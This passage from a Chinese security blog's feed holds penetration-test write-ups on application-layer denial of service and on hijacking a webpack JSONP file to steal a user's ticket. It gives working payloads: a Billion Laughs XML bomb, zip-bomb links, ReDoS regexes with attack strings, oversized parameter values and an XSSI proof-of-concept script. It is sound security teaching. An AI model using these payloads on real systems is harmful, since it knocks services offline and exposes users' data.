&lt;p&gt;此类场景多为：图片验证码、二维码&lt;/p&gt;

&lt;h4 id=&quot;实际场景&quot;&gt;实际场景&lt;/h4&gt;

&lt;p&gt;图片验证码在登录、注册、找回密码…等功能比较常见：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911055744176.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;关注一下接口地址：&lt;code&gt;https://attack/validcode?w=130&amp;amp;h=53&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;参数值：&lt;code&gt;w=130&amp;amp;h=53&lt;/code&gt;，我们可以理解为生成的验证码大小&lt;strong&gt;长为130&lt;/strong&gt;，&lt;strong&gt;宽为53&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;可以将&lt;code&gt;w=130&lt;/code&gt;修改为&lt;code&gt;w=130000000000000000&lt;/code&gt;，让服务器生成超大的图片验证码从而占用服务器资源造成拒绝服务。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911060427058.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;zip炸弹&quot;&gt;Zip炸弹&lt;/h3&gt;

&lt;p&gt;不知道各位有没有听说过Zip炸弹，一个42KB的压缩文件(Zip)，解压完其实是个&lt;code&gt;4.5PB&lt;/code&gt;的“炸弹”。&lt;/p&gt;

&lt;p&gt;先不说&lt;code&gt;4.5PB&lt;/code&gt;这个惊人的大小，光解压都会占用极大的内存。&lt;/p&gt;

&lt;p&gt;该文件的下载地址：https://www.bamsoftware.com/hacks/zipbomb/42.zip&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911070729869.jpg&quot; alt=&quot;-w447&quot; /&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;解压这个&lt;code&gt;42.zip&lt;/code&gt;以后会出现&lt;code&gt;16&lt;/code&gt;个压缩包，每个压缩包又包含&lt;code&gt;16&lt;/code&gt;个，如此循环&lt;code&gt;5&lt;/code&gt;次，最后得到&lt;code&gt;16&lt;/code&gt;的&lt;code&gt;5&lt;/code&gt;次方个文件，也就是&lt;code&gt;1048576&lt;/code&gt;个文件，这一百多万个最终文件，每个大小为&lt;code&gt;4.3GB&lt;/code&gt;。
因此整个解压过程结束以后，会得到 &lt;code&gt;1048576 * 4.6 GB = 4508876.8 GB&lt;/code&gt;，也就是 &lt;code&gt;4508876.8 ÷ 1024 ÷ 1024 = 4.5 PB&lt;/code&gt;。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;通过以上说明，我们可以寻找存在解压功能的Web场景进行拒绝服务攻击，但是这里有一个前置条件就是需要解压并可以递归解压。&lt;/p&gt;

&lt;p&gt;那我们想要完成这一攻击就非常的困难了，“前辈”也提到了非递归的Zip炸弹，也就是没有嵌套Zip文件文件的，如下表格：&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;名称&lt;/th&gt;
      &lt;th&gt;解压结果&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;a href=&quot;https://www.bamsoftware.com/hacks/zipbomb/zbsm.zip&quot;&gt;zbsm.zip&lt;/a&gt;&lt;/td&gt;
      &lt;td&gt;42 kB 	→ 	5.5 GB&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;a href=&quot;https://www.bamsoftware.com/hacks/zipbomb/zblg.zip&quot;&gt;zblg.zip&lt;/a&gt;&lt;/td&gt;
      &lt;td&gt;10 MB 	→ 	281 TB&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;a href=&quot;https://www.bamsoftware.com/hacks/zipbomb/zbxl.zip&quot;&gt;zbxl.zip&lt;/a&gt;&lt;/td&gt;
      &lt;td&gt;46 MB 	→ 	4.5 PB (Zip64, less compatible)&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;存在解压功能的Web场景还是比较多的，可以根据实际业务场景进行寻找。&lt;/p&gt;

&lt;h4 id=&quot;实际场景-1&quot;&gt;实际场景&lt;/h4&gt;

&lt;p&gt;根据实际业务场景发现一处上传模板文件功能，根据简单的测试，发现此处上传Zip文件会自动解压：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911064054609.jpg&quot; alt=&quot;-w176&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911081629641.jpg&quot; alt=&quot;-w400&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里我选择上传&lt;code&gt;zbsm.zip&lt;/code&gt;上去，看一下服务器反应:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911091742556.jpg&quot; alt=&quot;-w171&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里整个服务的请求都没有返回结果，成功造成拒绝服务。&lt;/p&gt;

&lt;h3 id=&quot;xdosxml拒绝服务攻击&quot;&gt;XDoS(XML拒绝服务攻击)&lt;/h3&gt;

&lt;p&gt;XDoS，XML拒绝服务攻击，其就是利用DTD产生XML炸弹，当服务端去解析XML文档时，会迅速占用大量内存去解析，下面我们来看几个XML文档的例子。&lt;/p&gt;

&lt;h4 id=&quot;billion-laughs&quot;&gt;Billion Laughs&lt;/h4&gt;

&lt;p&gt;据说这被称为&lt;strong&gt;十亿大笑DoS攻击&lt;/strong&gt;，其文件内容为：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-xml&quot;&gt;&amp;lt;!DOCTYPE keyz [
  &amp;lt;!ENTITY key &quot;key&quot;&amp;gt;
  &amp;lt;!ENTITY key2 &quot;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&amp;amp;key;&quot;&amp;gt;
  &amp;lt;!ENTITY key3 &quot;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&amp;amp;key2;&quot;&amp;gt;
  &amp;lt;!ENTITY key4 &quot;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&amp;amp;key3;&quot;&amp;gt;
  &amp;lt;!ENTITY key5 &quot;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&amp;amp;key4;&quot;&amp;gt;
  &amp;lt;!ENTITY key6 &quot;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&amp;amp;key5;&quot;&amp;gt;
  &amp;lt;!ENTITY key7 &quot;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&amp;amp;key6;&quot;&amp;gt;
  &amp;lt;!ENTITY key8 &quot;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&amp;amp;key7;&quot;&amp;gt;
  &amp;lt;!ENTITY key9 &quot;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&amp;amp;key8;&quot;&amp;gt;
]&amp;gt;
&amp;lt;keyz&amp;gt;&amp;amp;key9;&amp;lt;/keyz&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这是一段实体定义，从下向上观察第一层发现&lt;code&gt;key9&lt;/code&gt;由10个&lt;code&gt;key8&lt;/code&gt;组成，由此类推得出&lt;code&gt;key[n]&lt;/code&gt;由10个&lt;code&gt;key[n-1]&lt;/code&gt;组成，那么最终算下来实际上&lt;code&gt;key9&lt;/code&gt;由&lt;code&gt;10^9&lt;/code&gt;(1000000000)个&lt;code&gt;key[..]&lt;/code&gt;组成，也算是名副其实了～&lt;/p&gt;

&lt;p&gt;本地测试解析该XML文档，大概占用内存在2.5GB左右（其他文章中出现的均为3GB左右内存）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911734062132.jpg&quot; alt=&quot;-w607&quot; /&gt;&lt;/p&gt;

&lt;p&gt;试想：&lt;strong&gt;这只是9层级炸弹，如果再多一点呢？&lt;/strong&gt;&lt;/p&gt;

&lt;h4 id=&quot;external-entity&quot;&gt;External Entity&lt;/h4&gt;

&lt;p&gt;外部实体引用，文档内容如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-xml&quot;&gt;&amp;lt;!DOCTYPE keyz [
    &amp;lt;!ENTITY wechat SYSTEM &quot;https://dldir1.qq.com/weixin/Windows/WeChatSetup.exe&quot;&amp;gt;
]&amp;gt;
&amp;lt;keyz&amp;gt;&amp;amp;wechat;&amp;lt;/keyz&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这个理解起来就很简单了，就是从外部的链接中去获取解析实体，而我们可以设置这个解析URL为一个超大文件的下载地址，以上所举例就是微信的。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911781853694.jpg&quot; alt=&quot;-w370&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当然，我们也可以设置一个不返回结果的地址，如果外部地址不返回结果，那么这个解析就会在此处一直挂起从而占用内存。&lt;/p&gt;

&lt;h4 id=&quot;internal-entity&quot;&gt;Internal Entity&lt;/h4&gt;

&lt;p&gt;内部实体引用，文档内容如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-xml&quot;&gt;&amp;lt;!DOCTYPE keyz [
  &amp;lt;!ENTITY a &quot;a...a&quot;&amp;gt;
]&amp;gt;
&amp;lt;keyz&amp;gt;&amp;amp;a;...&amp;amp;a;&amp;lt;/keyz&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其意思就是实体&lt;code&gt;a&lt;/code&gt;的内容又臭又长，而后又N次引用这个实体内容，这就会造成解析的时候占用大量资源。&lt;/p&gt;

&lt;h4 id=&quot;实际场景-2&quot;&gt;实际场景&lt;/h4&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15911513808996.jpg&quot; alt=&quot;-w455&quot; /&gt;&lt;/p&gt;

&lt;p&gt;一开始通过此处上传&lt;code&gt;doc&lt;/code&gt;文档的功能，发现了一枚&lt;code&gt;XXE注入&lt;/code&gt;，提交后厂商进行修复，但复测后发现其修复的结果就是黑名单&lt;code&gt;SYSTEM&lt;/code&gt;关键词，没办法通过带外通道读取敏感数据了～&lt;/p&gt;

&lt;p&gt;抱着试一试的心态将&lt;code&gt;Billion Laughs&lt;/code&gt;的&lt;code&gt;Payload&lt;/code&gt;放入到&lt;code&gt;doc&lt;/code&gt;文档中(这里与&lt;code&gt;XXE doc文档&lt;/code&gt;制作方式一样修改&lt;code&gt;[Content_Types].xml&lt;/code&gt;文件，重新打包即可)：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912347343829.jpg&quot; alt=&quot;-w1274&quot; /&gt;&lt;/p&gt;

&lt;p&gt;上传之后产生的效果就是网站延时极高，至此就完成了整个测试。&lt;/p&gt;

&lt;h3 id=&quot;redos正则表达式拒绝服务攻击&quot;&gt;ReDoS(正则表达式拒绝服务攻击)&lt;/h3&gt;

&lt;p&gt;ReDoS，正则表达式拒绝服务攻击，顾名思义，就是由正则表达式造成的拒绝服务攻击，当编写校验的正则表达式存在缺陷或者不严谨时，攻击者可以构造特殊的字符串来大量消耗服务器的系统资源，造成服务器的服务中断或停止。&lt;/p&gt;

&lt;p&gt;在正式了解ReDoS之前，我们需要先了解一下正则表达式的两类引擎：&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;名称&lt;/th&gt;
      &lt;th&gt;区别&lt;/th&gt;
      &lt;th&gt;应用&lt;/th&gt;
      &lt;th&gt;匹配方式&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;DFA&lt;/td&gt;
      &lt;td&gt;DFA对于文本串里的每一个字符只需扫描一次，速度快、特性少&lt;/td&gt;
      &lt;td&gt;awk(大多数版本)、egrep（大多数版本）、flex、lex、MySQL、Procmail…&lt;/td&gt;
      &lt;td&gt;文本比较正则&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;NFA&lt;/td&gt;
      &lt;td&gt;NFA要翻来覆去标注字符、取消标注字符，速度慢，但是特性(如:分组、替换、分割)丰富&lt;/td&gt;
      &lt;td&gt;GNU Emacs、Java、grep（大多数版本）、less、more、.NET语言、PCRE library、Perl、PHP（所有三套正则库）、Python、Ruby、set（大多数版本）、vi…&lt;/td&gt;
      &lt;td&gt;正则比较文本&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;文本比较正则：看到一个子正则，就把可能匹配的文本全标注出来，然后再看正则的下一个部分，根据新的匹配结果更新标注。&lt;/p&gt;

&lt;p&gt;正则比较文本：看见一个字符，就把它跟正则比较，匹配就标注下来，然后接着往下匹配。一旦不匹配，就忽略这个字符，以此类推，直到回到上一次标注匹配的地方。&lt;/p&gt;

&lt;p&gt;那么存在ReDoS的核心就是&lt;strong&gt;NFA正则表达式引擎&lt;/strong&gt;，它的多模式会让自身陷入递归险境，从而导致占用大量CPU资源，性能极差，严重则导致拒绝服务。&lt;/p&gt;

&lt;h4 id=&quot;nfa-回溯&quot;&gt;NFA 回溯&lt;/h4&gt;

&lt;p&gt;简单的聊一下什么是回溯，这里有一个正则表达式：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-regex&quot;&gt;ke{1,3}y 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其意图很简单，&lt;code&gt;e&lt;/code&gt;字符需要匹配1-3次，&lt;code&gt;k&lt;/code&gt;、&lt;code&gt;y&lt;/code&gt;匹配一次即可。&lt;/p&gt;

&lt;p&gt;现在我们遇到了两个需要匹配的字符串：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;keeey&lt;/li&gt;
  &lt;li&gt;key&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;字符串&lt;code&gt;keeey&lt;/code&gt;的匹配过程是一气呵成的：匹配&lt;code&gt;k&lt;/code&gt;完成之后，完整匹配&lt;code&gt;e&lt;/code&gt;，最后是匹配&lt;code&gt;y&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;字符串&lt;code&gt;key&lt;/code&gt;的匹配过程就发生了回溯，其匹配过程如下图所示（&lt;strong&gt;橙色为匹配，黄色为不匹配&lt;/strong&gt;）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912407800934.jpg&quot; alt=&quot;-w630&quot; /&gt;&lt;/p&gt;

&lt;p&gt;前两步属于正常，但从第3步开始就不一样了，这里字符串&lt;code&gt;key&lt;/code&gt;已经有一个&lt;code&gt;e&lt;/code&gt;被&lt;code&gt;e{1,3}&lt;/code&gt;匹配，但它不会就此作罢，而会继续向后用正则&lt;code&gt;e{1,3}&lt;/code&gt;匹配字符&lt;code&gt;y&lt;/code&gt;，而当发现字符不匹配后，就忽略该字符，返回到上一次标注匹配的字符&lt;code&gt;e&lt;/code&gt;再进行一次匹配，至此就发生了一次回溯，最后匹配&lt;code&gt;y&lt;/code&gt;结束整个正则匹配过程。&lt;/p&gt;

&lt;p&gt;那么为什么会产生回溯呢？这跟NFA的贪婪模式有关（贪婪模式默认是开启的）。&lt;/p&gt;

&lt;h4 id=&quot;nfa-贪婪&quot;&gt;NFA 贪婪&lt;/h4&gt;

&lt;p&gt;我们想要彻底摸清楚整个过程就要抛根问底，究其原理，所以来了解一下贪婪模式～&lt;/p&gt;

&lt;p&gt;根据以上所举的案例我们可以理解贪婪模式导致的回溯其实就是：&lt;strong&gt;不撞南墙不回头&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;以下所列的元字符，大家应该都清楚其用法：&lt;/p&gt;

&lt;p&gt;i. &lt;code&gt;?&lt;/code&gt;: 告诉引擎匹配前导字符0次或一次，事实上是表示前导字符是可选的。
ii. &lt;code&gt;+&lt;/code&gt;: 告诉引擎匹配前导字符1次或多次。
iii. &lt;code&gt;*&lt;/code&gt;: 告诉引擎匹配前导字符0次或多次。
iv. &lt;code&gt;{min, max}&lt;/code&gt;: 告诉引擎匹配前导字符min次到max次。min和max都是非负整数。如果有逗号而max被省略了，则表示max没有限制；如果逗号和max都被省略了，则表示重复min次。&lt;/p&gt;

&lt;p&gt;默认情况下，这个几个元字符都是贪婪的，也就是说，它会根据前导字符去匹配尽可能多的内容。这也就解释了之前所举例的回溯事件了。&lt;/p&gt;

&lt;h4 id=&quot;恶意正则表达式&quot;&gt;恶意正则表达式&lt;/h4&gt;

&lt;p&gt;错误的使用以上所列的元字符就会导致拒绝服务的风险，此类称之为恶意的正则表达式，其表现形式为：&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;使用重复分组构造&lt;/li&gt;
  &lt;li&gt;在重复组内会出现：重复、交替重叠&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;简单的表达出来就是以下几种情况(有缺陷的正则表达式会&lt;strong&gt;包含如下部分&lt;/strong&gt;)：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-regex&quot;&gt;(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} for x &amp;gt; 10
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;redos-恶意正则检测&quot;&gt;ReDoS 恶意正则检测&lt;/h4&gt;

&lt;p&gt;对于复杂的恶意正则表达式，靠人工去看难免有些许费劲，推荐一款工具：https://github.com/superhuman/rxxr2/tree/fix-multiline (安装参考项目的&lt;code&gt;readme&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;该工具支持大批量的正则表达式检测，并给出检测结果。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15913217511512.jpg&quot; alt=&quot;-w294&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;实际场景-3&quot;&gt;实际场景&lt;/h4&gt;

&lt;p&gt;很庆幸的是大多Web脚本语言的正则引擎都为NFA，所以也很方便我们做一些Web层面的挖掘。&lt;/p&gt;

&lt;p&gt;做测试的时候大家有没有发现过这样一个逻辑：&lt;strong&gt;密码中不能包含用户名&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912543787232.jpg&quot; alt=&quot;-w504&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这是一个用户添加的功能，其校验是通过后端的，请求包如下&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /index/userAdd HTTP/1.1
Host: [host]
...

nickname=xxx&amp;amp;password=xxx&amp;amp;...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;当&lt;code&gt;password&lt;/code&gt;中包含&lt;code&gt;nickname&lt;/code&gt;则提示&lt;strong&gt;密码中不能包含用户名&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;利用Python简单还原一下后端逻辑：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;# -*- coding: utf-8 -*-
import sys,re
username = sys.argv[1]
password = sys.argv[2]

regex = re.compile(username)
if (regex.match(password)):
    print u&apos;密码中不能包含用户名&apos;
else:
    print u&apos;用户添加成功&apos;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912570317566.jpg&quot; alt=&quot;-w468&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这时候用户名是一个正则，密码是一个待匹配字符串，而这时候我们都可以进行控制，也就能构建恶意的正则的表达式和字符串进行ReDoS攻击。&lt;/p&gt;

&lt;p&gt;恶意的正则表达式：&lt;code&gt;a(b|c+)+d&lt;/code&gt;
字符串（我们要想让其陷入回溯模式就不能让其匹配到，所以使用&lt;code&gt;ac......cx&lt;/code&gt;的格式即可）：&lt;code&gt;acccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccx&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;如下图所示ReDoS攻击成功：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912572931314.jpg&quot; alt=&quot;-w905&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们只需要以同样的方式替换原请求包中的参数值即可（&lt;strong&gt;前提是该功能没有限制字符串长度和特殊字符&lt;/strong&gt;）～&lt;/p&gt;

&lt;p&gt;还有更多应用场景等待去发现，这里就不过多赘述了～&lt;/p&gt;

&lt;h3 id=&quot;数据查询数量可控&quot;&gt;数据查询数量可控&lt;/h3&gt;

&lt;p&gt;想必如下这类接口大家都见多了吧：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;/api/getInfo?page=1&amp;amp;page_size=10 ...
/api/viewData?startTime=&amp;amp;endTime=1591258015173 ... 
...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;而这类接口通常都是调用数据的，当一个系统数据量十分大（这也是拒绝服务的前提）的时候就需要分页功能去优化性能，那我们尝试将这个可控的数据查询量的参数数值进行修改会怎么样？比如&lt;code&gt;page_size=10000&lt;/code&gt;，再去请求会发现服务器明显有返回延迟（大量数据的查询展示）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-06-22/15912593992264.jpg&quot; alt=&quot;-w271&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那如果是&lt;code&gt;page_size=100000000000&lt;/code&gt;呢？想象一下，从查询到数据格式的处理返回展示，要占用巨大的服务器资源，我们如果尝试去多次重放此类请求，服务器终究还是无法承受这样的“力量”，最后导致宕机…&lt;/p&gt;

&lt;p&gt;时间参数&lt;code&gt;startTime&lt;/code&gt;也是如此，我们可以置空或设为&lt;code&gt;0&lt;/code&gt;让其查询数据的时间范围为最大…以此类推、举一反三。&lt;/p&gt;

&lt;h2 id=&quot;references&quot;&gt;References&lt;/h2&gt;

&lt;p&gt;https://bbs.pediy.com/thread-252487.htm&lt;/p&gt;

&lt;p&gt;https://www.checkmarx.com/wp-content/uploads/2015/03/ReDoS-Attacks.pdf&lt;/p&gt;

&lt;p&gt;https://zhuanlan.zhihu.com/p/41800341&lt;/p&gt;
</description>
          <pubDate>2020-06-22T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-06-22/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-06-22/1</guid>
        </item>
      
    
      
        <item>
          <title>[XSSI]动态JS劫持用户信息</title>
          <description>&lt;h1 id=&quot;动态js劫持用户信息&quot;&gt;动态JS劫持用户信息&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Webpack+JSONP劫持&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;作者：key&lt;/p&gt;

&lt;p&gt;注：本文已对敏感信息脱敏化，如有雷同纯属巧合。&lt;/p&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;在做测试的时候发现一个请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /user/getUserInfo HTTP/1.1
Host: xxxxx
Cookie: xxxx

ticket=xxxxx
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其对应返回的信息包含了我本身用户的敏感信息：手机号、姓名、邮箱…&lt;/p&gt;

&lt;p&gt;通过BurpSuite的插件&lt;code&gt;Logger++&lt;/code&gt;搜索发现该&lt;code&gt;ticket&lt;/code&gt;值居然出现在了JS文件中：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15782203133182.jpg&quot; alt=&quot;-w699&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;确定漏洞&quot;&gt;确定漏洞&lt;/h2&gt;

&lt;p&gt;通过测试我发现以上所述请求中的&lt;code&gt;Cookie&lt;/code&gt;为无效请求头，后端不对齐校验，但对&lt;code&gt;ticket&lt;/code&gt;校验，也就说明此处的&lt;code&gt;ticket&lt;/code&gt;代表了获取用户信息的关键参数，换种说法：&lt;strong&gt;当你知道用户的&lt;code&gt;ticket&lt;/code&gt;参数即可获取该用户信息&lt;/strong&gt;。&lt;/p&gt;

&lt;h2 id=&quot;判断js动静态&quot;&gt;判断JS动静态&lt;/h2&gt;

&lt;p&gt;当我在&lt;code&gt;Logger++插件&lt;/code&gt;搜索到&lt;code&gt;ticket值&lt;/code&gt;存在JS文件内容时，我的第一想法就是这个JS文件为动态类型，其文件内容跟随用户凭证字段的变化而变化。&lt;/p&gt;

&lt;p&gt;测试：删除Cookie字段，结果：&lt;code&gt;ticket&lt;/code&gt;参数值消失，由此可以判断该JS内容为动态类型。&lt;/p&gt;

&lt;p&gt;再尝试将测试账户A的Cookie字段内容替换为测试账户B的Cookie字段内容，结果：&lt;code&gt;ticket&lt;/code&gt;参数值变为测试账户B用户的对应值，由此可以判断该JS文件路径是固定的，并不是动态路径。&lt;/p&gt;

&lt;h2 id=&quot;webpackjsonp劫持&quot;&gt;Webpack+JSONP劫持&lt;/h2&gt;

&lt;p&gt;已知JS文件路径为：&lt;code&gt;https://website/app.xxxxx.js&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;查看其文件内容发现其被Webpack打包过：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15782208726972.jpg&quot; alt=&quot;-w143&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那么我们想要劫持这个JS文件内容其实就可以使用JSONP的PoC代码（因为这段JS文件内容就是&lt;code&gt;自定义函数+传入参数&lt;/code&gt;）：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;&amp;lt;script&amp;gt;
function webpackJsonp(data) {
	alert(data)
}
&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;https://website/app.xxxxx.js&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但这样得不到我们想要的&lt;code&gt;ticket&lt;/code&gt;值，简单的看了下JS代码，这段JS代码内容的格式是这样的：&lt;/p&gt;

&lt;p&gt;webpackJsonp 函数传入两个参数：第一个参数毫无用处，第二个参数传入的值包含了我们想要的&lt;code&gt;ticket&lt;/code&gt;值。&lt;/p&gt;

&lt;p&gt;那以上代码就可以这样修改：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;&amp;lt;script&amp;gt;
function webpackJsonp(data, data1) {
	alert(data1)
}
&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;https://website/app.xxxxx.js&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但我们还是没得到我们想要的信息：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15782215229911.jpg&quot; alt=&quot;-w517&quot; /&gt;&lt;/p&gt;

&lt;p&gt;因为第二段参数传入的值还需要进行解析，我发现这段值内容就是一段JSON对象，而对象的每个属性都在定义一个函数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15782216768669.jpg&quot; alt=&quot;-w411&quot; /&gt;&lt;/p&gt;

&lt;p&gt;寻找&lt;code&gt;ticket&lt;/code&gt;所在函数位置，发现其在&lt;code&gt;jbTV: function...&lt;/code&gt;内，知道了所在函数位置，PoC代码只需要这样进行构建：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;&amp;lt;script&amp;gt;
function webpackJsonp(data, data1) {
	alert(data1[&apos;jbTV&apos;])
}
&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;https://website/app.xxxxx.js&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;访问，成功获取：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-01-08/15782218407604.jpg&quot; alt=&quot;-w1239&quot; /&gt;&lt;/p&gt;

&lt;p&gt;后面只需要稍微的加个正则就可以了～&lt;/p&gt;

&lt;h2 id=&quot;攻击方式&quot;&gt;攻击方式&lt;/h2&gt;

&lt;p&gt;用户登录状态，访问该漏洞页面，触发即可获取到&lt;code&gt;ticket&lt;/code&gt;值，将该值带入以上所列请求中即可越权获取用户信息&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;心细一点，漏洞就在眼前，&lt;/p&gt;
</description>
          <pubDate>2020-01-08T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-01-08/3</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-01-08/3</guid>
        </item>
      
    
      
        <item>
          <title>利用SourceMap还原网站原始代码(前端)</title>
          <description>&lt;h1 id=&quot;利用sourcemap还原网站原始代码前端&quot;&gt;利用SourceMap还原网站原始代码(前端)&lt;/h1&gt;

&lt;p&gt;作者：key&lt;/p&gt;

